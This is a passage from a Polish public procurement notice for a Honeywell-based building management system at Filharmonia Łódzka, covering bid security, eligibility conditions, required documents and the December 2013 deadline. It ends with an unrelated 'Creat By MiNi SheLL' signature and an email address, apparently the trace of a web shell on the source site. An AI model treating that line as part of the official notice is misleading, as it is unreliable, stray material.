2) Jeżeli wadium wnoszone jest w formie poręczenia, poręczenie powinno być sporządzone zgodnie z obowiązującym prawem oraz winno zawierać następujące elementy: 
a) nazwę poręczyciela, nazwę wierzyciela (Zamawiający), nazwę dłużnika (Wykonawcy) na rzecz którego udzielane jest poręczenie oraz wskazanie ich siedzib, numer zamówienia nadany przez Zamawiającego, nazwę zamówienia; 
b) określenie wierzytelności, która ma być zabezpieczona poręczeniem; 
c) określenie wysokości wierzytelności objętej poręczeniem; 
d) termin ważności poręczenia (nie może być krótszy niż termin związania Wykonawcy złożoną przez 
niego ofertą); 
e) zobowiązanie poręczyciela do zapłacenia kwoty poręczenia na pisemne żądanie Zamawiającego 
zawierające oświadczenie, iż Wykonawca, którego ofertę wybrano: 
-	odmówił podpisana umowy na warunkach określonych w ofercie,  lub 
-	nie wniósł zabezpieczenia należytego wykonania umowy, lub  
-	zawarcie umowy stało się niemożliwe z przyczyn leżących po stronie Wykonawcy lub
-	jeżeli Wykonawca w odpowiedzi na wezwanie, o którym mowa w art.26 ust.3 u.p.z.p., nie złożył dokumentów lub oświadczeń, o których mowa w art.25 ust.1 tej ustawy, lub pełnomocnictw, chyba że udowodni, że wynika to z przyczyn nie leżących po jego stronie.


Zamawiający zwraca wadium niezwłocznie wszystkim wykonawcom po wyborze najkorzystniejszej oferty lub unieważnieniu postępowania, z wyjątkiem wykonawcy, którego oferta została wybrana jako najkorzystniejsza. Wykonawcy, którego oferta została wybrana jako najkorzystniejsza, Zamawiający zwraca wadium niezwłocznie po zawarciu umowy w sprawie 
Zamawiający zwraca niezwłocznie wadium, na wniosek Wykonawcy, który wycofał ofertę przed upływem terminu składania ofert; 
Zamawiający żąda ponownego wniesienia wadium przez wykonawcę, któremu zwrócono wadium w związku z wyborem innej oferty lub unieważnieniem postępowania, jeżeli w wyniku rozstrzygnięcia odwołania jego oferta została wybrana jako najkorzystniejsza. Wykonawca wnosi wadium w terminie określonym przez Zamawiającego. 
Jeżeli wadium wniesiono w pieniądzu, zamawiający zwraca je wraz z odsetkami wynikającymi z umowy rachunku bankowego, na którym było ono przechowywane,  pomniejszone o koszty prowadzenia rachunku bankowego oraz prowizji bankowej za przelew pieniędzy na rachunek bankowy wskazany przez wykonawcę. 
Zamawiający zatrzymuje wadium wraz z odsetkami, jeżeli wykonawca w odpowiedzi na wezwanie, o którym mowa w art. 26 ust. 3 u.p.z.p., nie złożył dokumentów lub oświadczeń, o których mowa w art. 25 ust. 1 u.p.z.p., lub pełnomocnictw, chyba że udowodni, że wynika to z przyczyn nieleżących po jego stronie. 
Zamawiający zatrzymuje wadium wraz z odsetkami, jeżeli wykonawca, którego oferta   została wybrana: 
          1) odmówił podpisania umowy w sprawie zamówienia publicznego na warunkach
          określonych w ofercie; 
          2) nie wniósł wymaganego zabezpieczenia należytego wykonania umowy;
          3) zawarcie umowy w sprawie zamówienia publicznego stało się niemożliwe z 
          przyczyn leżących po stronie wykonawcy.</p>
<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie wyznacza szczegółowego warunku w tym zakresie. Warunek ten zostanie spełniony jeśli Wykonawca złoży oświadczenie o spełnieniu warunków udziału w postępowaniu z art. 22 ust. 1 ustawy Prawo zamówień publicznych.</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>W szczególności Wykonawca musi spełniać następujące warunki: 
 winien wykonać w okresie ostatnich trzech lat przed dniem wszczęcia postępowania o udzielenie zamówienia, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, odpowiadających swoim rodzajem 3 usługi (system BMS integrujący sterowniki firmy Honeywell) o wartości brutto minimum 150.000 PLN każda, z podaniem ich wartości oraz daty i miejsca wykonania oraz załączeniem dokumentów potwierdzających, że usługi te zostały wykonane należycie (w przypadku wspólnego ubiegania się dwóch lub więcej Wykonawców o udzielenie niniejszego zamówienia, oceniany będzie ich łączny potencjał techniczny i doświadczenie).</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie wyznacza szczegółowego warunku w tym zakresie. Warunek ten zostanie spełniony jeśli Wykonawca złoży oświadczenie o spełnieniu warunków udziału w postępowaniu z art. 22 ust. 1 ustawy Prawo zamówień publicznych.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Warunek zostanie spełniony, jeżeli Wykonawca wykaże, że osoby którymi dysponuje lub będzie dysponować (minimum 3 osoby) zostały przeszkolone przez producenta urządzeń  w zakresie instalacji, konfiguracji i serwisu oferowanych urządzeń (wymagane certyfikaty).</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>sytuacja finansowa - Zamawiający nie wyznacza szczegółowego warunku w tym zakresie. Warunek ten zostanie spełniony jeśli Wykonawca złoży oświadczenie o spełnieniu warunków udziału w postępowaniu z art. 22 ust. 1 ustawy Prawo zamówień publicznych.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, głównych dostaw lub usług, w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wraz z podaniem ich wartości, przedmiotu, dat wykonania i podmiotów, na rzecz których dostawy lub usługi zostały wykonane, oraz załączeniem dowodów, czy zostały wykonane lub są wykonywane należycie;</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych do wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami;</li>

<li  style="margin-bottom: 12px;">opłaconą polisę, a w przypadku jej braku, inny dokument potwierdzający, że wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia.</li>

</ul>
<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego naczelnika urzędu skarbowego potwierdzające, że wykonawca nie zalega z opłacaniem podatków, lub zaświadczenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające, że wykonawca nie zalega z opłacaniem składek na ubezpieczenia zdrowotne i społeczne, lub potwierdzenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu -  wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">wykonawca powołujący się przy wykazywaniu spełniania warunków udziału w postępowaniu na zasoby innych podmiotów, które będą brały udział w realizacji części zamówienia, przedkłada także dokumenty dotyczące tego podmiotu w zakresie wymaganym dla wykonawcy, określonym w pkt III.4.2.</li>

</ul>

<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">nie zalega z uiszczaniem podatków, opłat, składek na ubezpieczenie społeczne i zdrowotne albo że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawiony nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><br><p class="bold">

III.5) INFORMACJA O DOKUMENTACH POTWIERDZAJĄCYCH, ŻE OFEROWANE DOSTAWY, USŁUGI LUB ROBOTY BUDOWLANE ODPOWIADAJĄ OKREŚLONYM WYMAGANIOM</p>
<p class="bold">W zakresie potwierdzenia, że oferowane roboty budowlane, dostawy lub usługi odpowiadają określonym wymaganiom należy przedłożyć:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc">
<li style="margin-bottom: 12px;">zaświadczenie niezależnego podmiotu uprawnionego do kontroli jakości potwierdzającego, że dostarczane produkty odpowiadają określonym normom lub specyfikacjom technicznym;</li>

</ul><p><b>III.6) INNE DOKUMENTY</b></p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>1.	Autoryzacja Producenta uprawniająca do projektowania, montażu, instalacji, konserwacji  i serwisu oferowanego systemu BMS;
2.	Deklaracja dostawcy / producenta sprzętu BMS o dostępności zaproponowanych rozwiązań lub ich zamienników w okresie min. 10 lat od dnia podpisania umowy.</p>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b></p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>a/ termin może ulec zmianie w przypadku wystąpienia okoliczności nie zawinionych przez strony, których nie można było wcześniej przewidzieć, pomimo zachowania należytej staranności.
b/ zmiany przepisów prawa w trakcie realizacji umowy.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.filharmonia.lodz.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Filharmonia Łódzka im. Artura Rubinsteina 
ul. Narutowicza 20/22
90-135 Łódź.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 13.12.2013 godzina 09:00, miejsce: Filharmonia Łódzka im. Artura Rubinsteina 
ul. Narutowicza 20/22
90-135 Łódź 
sekretariat II piętro.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> Projekt współfinansowany przez Unię Europejską z Europejskiego Funduszu Rozwoju Regionalnego Programu Operacyjnego Województwa Łódzkiego na lata 2007-2013.</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com